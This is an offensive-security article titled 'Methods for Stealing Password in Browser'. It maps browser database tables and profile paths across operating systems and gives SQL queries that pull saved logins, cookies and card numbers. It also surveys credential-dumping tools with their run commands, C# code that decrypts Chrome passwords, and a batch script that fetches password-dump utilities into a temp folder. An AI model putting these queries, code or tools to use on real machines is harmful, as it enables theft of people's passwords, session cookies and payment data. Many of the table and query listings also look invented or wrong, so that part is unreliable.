Methods for Stealing Password in Browser

Methods for Stealing Password in Browser

Important Tables and Columns

Chrome

Table NameColumn Name(s)Description
loginsaction_url, username_value, password_valueSaved website logins and passwords
autofillname, valueAutofill data for forms and fields
cookieshost_key, name, valueStored browser cookies
bookmarksurl, titleBookmarked URLs and their titles
historyurl, titleBrowsing history URLs and their titles
downloadsurl, target_pathRecords of downloaded files
credit_cardsname_on_card, card_numberSaved credit card information
web_appsurl, nameInformation about web applications
extensionsname, permissionsInstalled browser extensions
top_sitesurl, titleMost visited sites
search_engineskeyword, urlSearch engine configuration
media_engagementorigin, last_engagement_time_usecMedia engagement data
media_historyorigin, playback_start_time_usecMedia playback history
media_sessionmedia_unique_idMedia playback sessions
visitsurl, visit_timeURLs visited and the corresponding times
downloads_url_chainsurl_chainURL chains for downloaded files
keywordskeywordKeyword searches made
keyword_search_termsurl, lower_termSearch terms used for specific keywords
usb_devicesguidInformation about connected USB devices
formsnameAutofill form data
originsoriginOrigins for various browser data
network_action_predictor_serviceurl, suggested_prioData for predicting network actions
protocol_handlerprotocol, urlCustom protocol handlers configured
startup_urlsurlURLs that open on browser startup
appcachecache_id, sizeApplication cache data
local_storageorigin, keyLocally stored data
extension_cookieshost_key, name, valueCookies set by extensions
managed_user_passwordsurl, username, passwordPasswords for managed users
translate_rankingoriginData related to website translations
android_faviconspage_urlFavicons for Android version

Firefox

Table NameColumn Name(s)Description
moz_loginsformSubmitURL, hostname, encryptedUsername, encryptedPasswordSaved website logins and passwords
moz_autofillname, valueAutofill data for forms and fields
moz_cookieshost, name, valueStored browser cookies
moz_bookmarksurl, titleBookmarked URLs and their titles
moz_historyvisitsfrom_visit, place_id, visit_dateVisits to URLs with corresponding data
moz_downloadssource, targetRecords of downloaded files
moz_creditcardsnameOnCard, cardNumberSaved credit card information
moz_placesurl, titleURLs and their corresponding titles
moz_extensionsname, permissionsInstalled browser extensions
moz_keywordskeywordKeyword searches made
moz_searchlogquerySearches made using the browser's search bar
moz_metakey, valueMetadata associated with various data
moz_originsoriginOrigins for various browser data
moz_annotationstype, nameUser annotations on bookmarks
moz_inputhistoryinputUser input history for forms
moz_faviconsurlFavicons associated with URLs
moz_inputhistoryplace_id, fieldnameUser input history for fields in forms
moz_pages_w_iconspage_urlURLs with associated favicons
moz_placesurl, title, visit_countVisited URLs with additional data
moz_annosanno_attribute_id, contentAnnotations on bookmarks or pages
moz_metakey, valueMetadata associated with various data
moz_annosplace_id, anno_attribute_idAnnotations on bookmarks or pages
moz_keywordsplace_id, keyword_idKeywords associated with places
moz_originsoriginOrigins for various browser data
moz_iconsurl, favicon_idFavicons associated with URLs
moz_webappsorigin, app_idInstalled web applications
moz_hostshostHosts that visited URLs
moz_cookiesbaseDomain, name, valueStored cookies
moz_syncedtabsurl, titleTabs synced across devices
moz_syncid, nameSynced data for user accounts
moz_preferenceshostname, valueUser preferences
moz_downloadstarget, stateRecords of downloaded files

Edge

Table NameColumn Name(s)Description
loginsaction_url, username_value, password_valueSaved website logins and passwords
autofillname, valueAutofill data for forms and fields
cookieshost_key, name, valueStored browser cookies
bookmarksurl, titleBookmarked URLs and their titles
historyurl, titleBrowsing history URLs and their titles
downloadsurl, target_pathRecords of downloaded files
credit_cardsname_on_card, card_numberSaved credit card information
extensionsname, permissionsInstalled browser extensions
top_sitesurl, titleMost visited sites
search_engineskeyword, urlSearch engine configuration
media_engagementorigin, last_engagement_time_usecMedia engagement data
media_historyorigin, playback_start_time_usecMedia playback history
media_sessionmedia_unique_idMedia playback sessions
visitsurl, visit_timeURLs visited and the corresponding times
downloads_url_chainsurl_chainURL chains for downloaded files
keywordskeywordKeyword searches made
keyword_search_termsurl, lower_termSearch terms used for specific keywords
usb_devicesguidInformation about connected USB devices
formsnameAutofill form data
originsoriginOrigins for various browser data
network_action_predictor_serviceurl, suggested_prioData for predicting network actions
protocol_handlerprotocol, urlCustom protocol handlers configured
startup_urlsurlURLs that open on browser startup
appcachecache_id, sizeApplication cache data
local_storageorigin, keyLocally stored data
extension_cookieshost_key, name, valueCookies set by extensions
managed_user_passwordsurl, username, passwordPasswords for managed users
translate_rankingoriginData related to website translations
android_faviconspage_urlFavicons for Android version

Awesome Query

Extract Cookies with Expiry Date

SELECT host_key, name, value, expires_utc FROM cookies;

Extract Autofill Data for Fields

SELECT name, value FROM autofill WHERE field_type = 'field';

Extract Bookmarked URLs with Tags

SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title;

Extract Downloaded Files with Source and Target

SELECT url, target_path, start_time, end_time FROM downloads;

Extract Form Input Data with Origin

SELECT origin, field_name, value FROM forms;

Extract User Input History for Form Fields

SELECT form_field, user_input FROM input_history;

Extract Visited URLs with Timestamp and Referrer

SELECT url, visit_time, referring_visit_id FROM visits;

Extract User Annotations on Bookmarks with Dates

SELECT url, annotation, created, modified FROM annotations;

Extract Web Applications and Install Dates

SELECT origin, app_id, last_update_time FROM web_apps;

Extract Hosts Visited by URLs

SELECT url, host FROM visits JOIN hosts ON visits.url = hosts.url;

Extract Media Engagement Time and Count

SELECT origin, SUM(count) AS total_engagement_count, MAX(last_engagement_time_usec) AS last_engagement_time FROM media_engagement GROUP BY origin;

Extract User Search Queries with Timestamp

SELECT keyword, url, search_time FROM search_engines;

Extract Passwords Used for Form Submissions

SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins WHERE formSubmitURL IS NOT NULL;

Extract Credit Card Expiration Years and Months

SELECT name_on_card, card_number, expiration_month, expiration_year FROM credit_cards;

Extract Synced Data with Device Information

SELECT id, name, device_type, last_modified FROM sync;

Extract Origins with Associated Data

SELECT origin, origin_attributes FROM origins;

Extract Extensions with Install Dates

SELECT name, permissions, install_date FROM extensions;

Extract Downloaded Files with Sizes

SELECT url, target_path, bytes_total FROM downloads;

Extract URL Chains for Downloaded Files

SELECT url_chain FROM downloads_url_chains;

Extract Media Playback Sessions with Durations

SELECT media_unique_id, playback_start_time_usec, duration_usec FROM media_session;

Extract USB Device Information

SELECT guid, manufacturer, product FROM usb_devices;

Extract Network Actions Predictions

SELECT url, suggested_prio FROM network_action_predictor_service;

Extract Protocol Handlers with Associated URLs

SELECT protocol, url FROM protocol_handler;

Extract Startup URLs with Timestamps

SELECT url, created FROM startup_urls;

Extract URLs with High Visit Counts

SELECT url, title, visit_count FROM visits WHERE visit_count > 100;

Extract Most Frequent Search Queries

SELECT keyword, COUNT(*) AS query_count FROM search_engines GROUP BY keyword ORDER BY query_count DESC LIMIT 10;

Extract Login Attempts with Failed Logins

SELECT action_url, username_value, password_value, times_used, times_failed FROM logins WHERE times_failed > 0;

Extract Bookmarked URLs by Tag

SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title HAVING bookmark_tags LIKE '%important%';

Extract User Input History for Suspicious Keywords

SELECT form_field, user_input, input_timestamp FROM input_history WHERE user_input LIKE '%password%' OR user_input LIKE '%credit card%';

Extract Synced Tabs with Last Update Timestamp

SELECT url, title, last_updated FROM synced_tabs;

Extract Cookies Set by Specific Domains

SELECT host_key, name, value FROM cookies WHERE host_key IN ('example.com', 'test.com');

Extract Form Input Data for Suspicious Domains

SELECT origin, field_name, value FROM forms WHERE origin LIKE '%phishing%';

Extract Downloaded Files from Suspicious URLs

SELECT url, target_path, start_time, end_time FROM downloads WHERE url LIKE '%malware%';

Extract User Annotations with Suspicious Keywords

SELECT url, annotation, created, modified FROM annotations WHERE annotation LIKE '%hack%' OR annotation LIKE '%exploit%';

Extract URLs Visited with High Engagement Time

SELECT url, visit_time FROM visits WHERE visit_time >= NOW() - INTERVAL 1 DAY ORDER BY visit_time DESC LIMIT 10;

Extract User Input History for Frequent Keywords

SELECT form_field, user_input, COUNT(*) AS input_count FROM input_history WHERE user_input IN ('password', 'credit card') GROUP BY form_field, user_input ORDER BY input_count DESC LIMIT 10;

Extract Most Used Extensions

SELECT name, COUNT(*) AS install_count FROM extensions GROUP BY name ORDER BY install_count DESC LIMIT 10;

Extract URLs with No Visits in the Last Month

SELECT url FROM history WHERE last_visit_time < NOW() - INTERVAL 30 DAY;

Extract Suspicious Media Playback Sessions

SELECT media_unique_id, playback_start_time_usec, duration_usec FROM media_session WHERE duration_usec > 3600000; -- Sessions longer than 1 hour

Extract URLs with Frequent Keyword Searches

SELECT url, title, COUNT(*) AS search_count FROM history WHERE title LIKE '%search%' GROUP BY url, title ORDER BY search_count DESC LIMIT 10;

Extract Frequent Form Inputs

SELECT origin, form_field, COUNT(*) AS input_count FROM forms GROUP BY origin, form_field ORDER BY input_count DESC LIMIT 10;

Extract Suspicious USB Device Connections

SELECT guid, manufacturer, product FROM usb_devices WHERE manufacturer LIKE '%unknown%' ORDER BY connection_timestamp DESC LIMIT 5;

Extract URL Chains for Suspicious Downloads

SELECT url_chain FROM downloads_url_chains WHERE url_chain LIKE '%malware%';

Extract Synced Data for Suspicious Devices

SELECT id, name, device_type, last_modified FROM sync WHERE device_type = 'unknown';

Extract URLs with Frequent Form Submissions

SELECT action_url, COUNT(*) AS submission_count FROM logins GROUP BY action_url ORDER BY submission_count DESC LIMIT 10;

Extract Suspicious Protocol Handlers

SELECT protocol, url FROM protocol_handler WHERE protocol LIKE '%exploit%' LIMIT 5;

Extract URLs with High Cookie Counts

SELECT host_key, COUNT(*) AS cookie_count FROM cookies GROUP BY host_key ORDER BY cookie_count DESC LIMIT 10;

Extract Origins with Suspicious Metadata

SELECT origin, origin_attributes FROM origins WHERE origin_attributes LIKE '%suspicious%';

Extract Frequent Extension Permissions

SELECT permissions, COUNT(*) AS extension_count FROM extensions GROUP BY permissions ORDER BY extension_count DESC LIMIT 10;

Extract Suspicious Autofill Data

SELECT name, value FROM autofill WHERE value LIKE '%password%' OR value LIKE '%credit card%';

Profiles

Google Chrome:

- Windows: C:\Users\<YourUsername>\AppData\Local\Google\Chrome\User Data\Default\Login Data - macOS: ~/Library/Application Support/Google/Chrome/Default/Login Data - Linux: ~/.config/google-chrome/Default/Login Data

Mozilla Firefox:

- Windows: C:\Users\<YourUsername>\AppData\Roaming\Mozilla\Firefox\Profiles\<ProfileName>\logins.json - macOS: ~/Library/Application Support/Firefox/Profiles/<ProfileName>/logins.json - Linux: ~/.mozilla/firefox/<ProfileName>/logins.json

Brave:

- Windows: C:\Users\<YourUsername>\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data - macOS: ~/Library/Application Support/BraveSoftware/Brave-Browser/Default/Login Data - Linux: ~/.config/BraveSoftware/Brave-Browser/Default/Login Data

Opera:

- Windows: C:\Users\<YourUsername>\AppData\Roaming\Opera Software\Opera Stable\Login Data - macOS: ~/Library/Application Support/com.operasoftware.Opera/Login Data - Linux: ~/.config/opera/Login Data

Microsoft Edge (Chromium-based):

  • Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

HackBrowserData

github.com/moonD4rk/HackBrowserData

HackBrowserData is a command-line tool for decrypting and exporting browser data ( passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension ) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.

.\hack-browser-data.exe -b all -f json --dir results -zip
or
.\hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"

How worked:

Windows

var (
    chromeUserDataPath     = homeDir + "/AppData/Local/Google/Chrome/User Data/Default/"
    chromeBetaUserDataPath = homeDir + "/AppData/Local/Google/Chrome Beta/User Data/Default/"
    chromiumUserDataPath   = homeDir + "/AppData/Local/Chromium/User Data/Default/"
    edgeProfilePath        = homeDir + "/AppData/Local/Microsoft/Edge/User Data/Default/"
    braveProfilePath       = homeDir + "/AppData/Local/BraveSoftware/Brave-Browser/User Data/Default/"
    speed360ProfilePath    = homeDir + "/AppData/Local/360chrome/Chrome/User Data/Default/"
    qqBrowserProfilePath   = homeDir + "/AppData/Local/Tencent/QQBrowser/User Data/Default/"
    operaProfilePath       = homeDir + "/AppData/Roaming/Opera Software/Opera Stable/"
    operaGXProfilePath     = homeDir + "/AppData/Roaming/Opera Software/Opera GX Stable/"
    vivaldiProfilePath     = homeDir + "/AppData/Local/Vivaldi/User Data/Default/"
    coccocProfilePath      = homeDir + "/AppData/Local/CocCoc/Browser/User Data/Default/"
    yandexProfilePath      = homeDir + "/AppData/Local/Yandex/YandexBrowser/User Data/Default/"
    dcBrowserProfilePath   = homeDir + "/AppData/Local/DCBrowser/User Data/Default/"
    sogouProfilePath       = homeDir + "/AppData/Roaming/SogouExplorer/Webkit/Default/"

    firefoxProfilePath = homeDir + "/AppData/Roaming/Mozilla/Firefox/Profiles/"
)

Linux

var (
    firefoxProfilePath    = homeDir + "/.mozilla/firefox/"
    chromeProfilePath     = homeDir + "/.config/google-chrome/Default/"
    chromiumProfilePath   = homeDir + "/.config/chromium/Default/"
    edgeProfilePath       = homeDir + "/.config/microsoft-edge/Default/"
    braveProfilePath      = homeDir + "/.config/BraveSoftware/Brave-Browser/Default/"
    chromeBetaProfilePath = homeDir + "/.config/google-chrome-beta/Default/"
    operaProfilePath      = homeDir + "/.config/opera/Default/"
    vivaldiProfilePath    = homeDir + "/.config/vivaldi/Default/"
)

Darwin

var (
    chromeProfilePath     = homeDir + "/Library/Application Support/Google/Chrome/Default/"
    chromeBetaProfilePath = homeDir + "/Library/Application Support/Google/Chrome Beta/Default/"
    chromiumProfilePath   = homeDir + "/Library/Application Support/Chromium/Default/"
    edgeProfilePath       = homeDir + "/Library/Application Support/Microsoft Edge/Default/"
    braveProfilePath      = homeDir + "/Library/Application Support/BraveSoftware/Brave-Browser/Default/"
    operaProfilePath      = homeDir + "/Library/Application Support/com.operasoftware.Opera/Default/"
    operaGXProfilePath    = homeDir + "/Library/Application Support/com.operasoftware.OperaGX/Default/"
    vivaldiProfilePath    = homeDir + "/Library/Application Support/Vivaldi/Default/"
    coccocProfilePath     = homeDir + "/Library/Application Support/Coccoc/Default/"
    yandexProfilePath     = homeDir + "/Library/Application Support/Yandex/YandexBrowser/Default/"
    arcProfilePath        = homeDir + "/Library/Application Support/Arc/User Data/Default"

    firefoxProfilePath = homeDir + "/Library/Application Support/Firefox/Profiles/"
)

Browser-password-stealer

github.com/henry-richard7/Browser-password-..

This python program gets all the saved passwords, credit cards and bookmarks from chromium based browsers supports chromium 80 and above!

pip install -r requirements.txt
python chromium_based_browsers.py

How worked:

browsers = {
    'amigo': appdata + '\\Amigo\\User Data',
    'torch': appdata + '\\Torch\\User Data',
    'kometa': appdata + '\\Kometa\\User Data',
    'orbitum': appdata + '\\Orbitum\\User Data',
    'cent-browser': appdata + '\\CentBrowser\\User Data',
    '7star': appdata + '\\7Star\\7Star\\User Data',
    'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
    'vivaldi': appdata + '\\Vivaldi\\User Data',
    'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
    'google-chrome': appdata + '\\Google\\Chrome\\User Data',
    'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
    'microsoft-edge': appdata + '\\Microsoft\\Edge\\User Data',
    'uran': appdata + '\\uCozMedia\\Uran\\User Data',
    'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
    'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
    'iridium': appdata + '\\Iridium\\User Data',
}

data_queries = {
    'login_data': {
        'query': 'SELECT action_url, username_value, password_value FROM logins',
        'file': '\\Login Data',
        'columns': ['URL', 'Email', 'Password'],
        'decrypt': True
    },
    'credit_cards': {
        'query': 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards',
        'file': '\\Web Data',
        'columns': ['Name On Card', 'Card Number', 'Expires On', 'Added On'],
        'decrypt': True
    },
    'cookies': {
        'query': 'SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies',
        'file': '\\Network\\Cookies',
        'columns': ['Host Key', 'Cookie Name', 'Path', 'Cookie', 'Expires On'],
        'decrypt': True
    },
    'history': {
        'query': 'SELECT url, title, last_visit_time FROM urls',
        'file': '\\History',
        'columns': ['URL', 'Title', 'Visited Time'],
        'decrypt': False
    },
    'downloads': {
        'query': 'SELECT tab_url, target_path FROM downloads',
        'file': '\\History',
        'columns': ['Download URL', 'Local Path'],
        'decrypt': False
    }
}

BrowserPass

github.com/jabiel/BrowserPass

is an open-source project that provides a command-line interface for fetching passwords stored in various browsers' password managers and presenting them in a standardized format. It's designed to be used on Linux-based systems and aims to be a convenient tool for users who want to access their passwords in a unified way.

cse *.sln

How worked:

namespace BrowserPass
{
    /// <summary>
    /// http://raidersec.blogspot.com/2013/06/how-browsers-store-your-passwords-and.html#chrome_decryption
    /// </summary>
    class ChromePassReader : IPassReader
    {
        public string BrowserName { get { return "Chrome"; } }

        private const string LOGIN_DATA_PATH = "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";


        public IEnumerable<CredentialModel> ReadPasswords()
        {
            var result = new List<CredentialModel>();

            var appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);// APPDATA
            var p = Path.GetFullPath(appdata + LOGIN_DATA_PATH);

            if (File.Exists(p))
            {
                using (var conn = new SQLiteConnection($"Data Source={p};"))
                {
                    conn.Open();
                    using (var cmd = conn.CreateCommand())
                    {
                        cmd.CommandText = "SELECT action_url, username_value, password_value FROM logins";
                        using (var reader = cmd.ExecuteReader())
                        {

                            if (reader.HasRows)
                            {
                                var key = GCDecryptor.GetKey();
                                while (reader.Read())
                                {
                                    byte[] nonce, ciphertextTag;
                                    var encryptedData = GetBytes(reader, 2);
                                    GCDecryptor.Prepare(encryptedData, out nonce, out ciphertextTag);
                                    var pass = GCDecryptor.Decrypt(ciphertextTag, key, nonce);

                                    result.Add(new CredentialModel()
                                               {
                                                   Url = reader.GetString(0),
                                                   Username = reader.GetString(1),
                                                   Password = pass
                                               });
                                }
                            }
                        }                            
                    }
                    conn.Close();
                }

            }
            else
            {
                throw new FileNotFoundException("Canno find chrome logins file");
            }
            return result;
        }

        private byte[] GetBytes(SQLiteDataReader reader, int columnIndex)
        {
            const int CHUNK_SIZE = 2 * 1024;
            byte[] buffer = new byte[CHUNK_SIZE];
            long bytesRead;
            long fieldOffset = 0;
            using (MemoryStream stream = new MemoryStream())
            {
                while ((bytesRead = reader.GetBytes(columnIndex, fieldOffset, buffer, 0, buffer.Length)) > 0)
                {
                    stream.Write(buffer, 0, (int)bytesRead);
                    fieldOffset += bytesRead;
                }
                return stream.ToArray();
            }
        }        
    }



}

WebBrowserPassView

nirsoft.net/utils/web_browser_password.html

WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.

WebBrowserPassView.exe

Infornito

github.com/globecyber/Infornito

Infornito developed in Python 3.x and has as purpose extract all forensic interesting information of Chrome, Firefox, Safari browsers to be analyzed. Due to its Python 3.x developement, might not work properly in old Python versions, mainly with certain characters. Works under Unix and Windows 32/64 bits systems. Works in command line interface, so information dumps could be redirected by pipes with tools such as grep, awk, cut, sed... Infornito allows to visualize following sections, search customization and extract certain content.

python infornito.py history --profile 2 --export csv --to ~/Desktop/export

or

python infornito.py downloads --profile 2

or

python infornito.py history --profile 2 --filter domain=target.com --filter filetype=pdf --filter protocols=https --filter port=4880

Hindsight

github.com/obsidianforensics/hindsight

Hindsight is a free tool for analyzing web artifacts. It started with the browsing history of the Google Chrome web browser and has expanded to support other Chromium-based applications (with more to come!). Hindsight can parse a number of different types of web artifacts, including URLs, download history, cache records, bookmarks, autofill records, saved passwords, preferences, browser extensions, HTTP cookies, and Local Storage records (HTML5 cookies). Once the data is extracted from each file, it is correlated with data from other history files and placed in a timeline.

pip install pyhindsight
curl -sSL https://raw.githubusercontent.com/obsidianforensics/hindsight/master/install-js.sh | sh

It has a simple web UI - to start it, run "hindsight_gui.py" (or on Windows, the packaged "hindsight_gui.exe") and visit http://localhost:8080

How worked:

- WinXP: [userdir]\Local Settings\Application Data\Google\Chrome\User Data\Default
- Vista/7/8/10: [userdir]\AppData\Local\Google\Chrome\User Data\Default
- Linux: [userdir]/.config/google-chrome/Default
- OS X: [userdir]/Library/Application Support/Google/Chrome/Default
- iOS: \Applications\com.google.chrome.ios\Library\Application Support\Google\Chrome\Default
- Android: /userdata/data/com.android.chrome/app_chrome/Default
- CrOS: \home\user\<GUID>

BrowserFreak

github.com/OsandaMalith/BrowserFreak

Automated Password Dumper for Web Browsers with Batch Script

BrowserFreak.bat

How worked:

::Downlaod Chrome::

echo strFileURL = "http://www.nirsoft.net/utils/chromepass.zip" > %temp%\freak\chrome.vbs
echo strHDLocation = "%temp%\freak\chromepass.zip" >> %temp%\freak\chrome.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\chrome.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\chrome.vbs
echo objXMLHTTP.send() >> %temp%\freak\chrome.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\chrome.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\chrome.vbs
echo objADOStream.Open >> %temp%\freak\chrome.vbs
echo objADOStream.Type = 1 >> %temp%\freak\chrome.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\chrome.vbs
echo objADOStream.Position = 0 >> %temp%\freak\chrome.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\chrome.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\chrome.vbs
echo Set objFSO = Nothing >> %temp%\freak\chrome.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\chrome.vbs
echo objADOStream.Close >> %temp%\freak\chrome.vbs
echo Set objADOStream = Nothing >> %temp%\freak\chrome.vbs
echo End if >> %temp%\freak\chrome.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\chrome.vbs
call %temp%\freak\chrome.vbs

::Download Firefox::
echo strFileURL = "http://www.nirsoft.net/utils/passwordfox.zip" > %temp%\freak\fire.vbs
echo strHDLocation = "%temp%\freak\passwordfox.zip" >> %temp%\freak\fire.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\fire.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\fire.vbs
echo objXMLHTTP.send() >> %temp%\freak\fire.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\fire.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\fire.vbs
echo objADOStream.Open >> %temp%\freak\fire.vbs
echo objADOStream.Type = 1 >> %temp%\freak\fire.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\fire.vbs
echo objADOStream.Position = 0 >> %temp%\freak\fire.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\fire.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\fire.vbs
echo Set objFSO = Nothing >> %temp%\freak\fire.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\fire.vbs
echo objADOStream.Close >> %temp%\freak\fire.vbs
echo Set objADOStream = Nothing >> %temp%\freak\fire.vbs
echo End if >> %temp%\freak\fire.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\fire.vbs
call %temp%\freak\fire.vbs

::Download IE::
echo strFileURL = "http://www.nirsoft.net/utils/iepv.zip" > %temp%\freak\ie.vbs
echo strHDLocation = "%temp%\freak\iepv.zip" >> %temp%\freak\ie.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\ie.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\ie.vbs
echo objXMLHTTP.send() >> %temp%\freak\ie.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\ie.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\ie.vbs
echo objADOStream.Open >> %temp%\freak\ie.vbs
echo objADOStream.Type = 1 >> %temp%\freak\ie.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\ie.vbs
echo objADOStream.Position = 0 >> %temp%\freak\ie.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\ie.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\ie.vbs
echo Set objFSO = Nothing >> %temp%\freak\ie.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\ie.vbs
echo objADOStream.Close >> %temp%\freak\ie.vbs
echo Set objADOStream = Nothing >> %temp%\freak\ie.vbs
echo End if >> %temp%\freak\ie.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\ie.vbs
call %temp%\freak\ie.vbs

::Download Opera::
echo strFileURL = "http://www.nirsoft.net/utils/operapassview.zip" > %temp%\freak\opera.vbs
echo strHDLocation = "%temp%\freak\operapassview.zip" >> %temp%\freak\opera.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\opera.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\opera.vbs
echo objXMLHTTP.send() >> %temp%\freak\opera.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\opera.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\opera.vbs
echo objADOStream.Open >> %temp%\freak\opera.vbs
echo objADOStream.Type = 1 >> %temp%\freak\opera.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\opera.vbs
echo objADOStream.Position = 0 >> %temp%\freak\opera.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\opera.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\opera.vbs
echo Set objFSO = Nothing >> %temp%\freak\opera.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\opera.vbs
echo objADOStream.Close >> %temp%\freak\opera.vbs
echo Set objADOStream = Nothing >> %temp%\freak\opera.vbs
echo End if >> %temp%\freak\opera.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\opera.vbs
call %temp%\freak\opera.vbs

::Download All:
echo strFileURL = "http://nirsoft.net/utils/webbrowserpassview.zip" > %temp%\freak\all.vbs
echo strHDLocation = "%temp%\freak\webbrowserpassview.zip" >> %temp%\freak\all.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\all.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\all.vbs
echo objXMLHTTP.send() >> %temp%\freak\all.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\all.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\all.vbs
echo objADOStream.Open >> %temp%\freak\all.vbs
echo objADOStream.Type = 1 >> %temp%\freak\all.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\all.vbs
echo objADOStream.Position = 0 >> %temp%\freak\all.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\all.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\all.vbs
echo Set objFSO = Nothing >> %temp%\freak\all.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\all.vbs
echo objADOStream.Close >> %temp%\freak\all.vbs
echo Set objADOStream = Nothing >> %temp%\freak\all.vbs
echo End if >> %temp%\freak\all.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\all.vbs
call %temp%\freak\all.vbs

BrowserStealer

github.com/SaulBerrenson/BrowserStealer

Simple password/cookies/history/bookmarks stealer/dumper for chrome all version (includes 80+), microsoft edge browser,includes all chromium based browsers, and all gecko based browser (firefox etc.).

BrowserCollector.exe

Cover By Victoria Trach